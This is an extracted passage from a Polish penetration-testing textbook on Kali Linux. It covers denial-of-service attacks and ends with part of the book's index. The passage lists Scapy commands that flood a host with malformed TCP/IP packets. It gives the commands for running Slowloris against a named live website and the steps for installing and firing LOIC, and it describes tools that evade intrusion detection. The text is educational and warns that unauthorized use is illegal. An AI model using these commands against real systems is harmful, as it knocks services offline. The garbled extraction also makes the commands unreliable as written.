Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

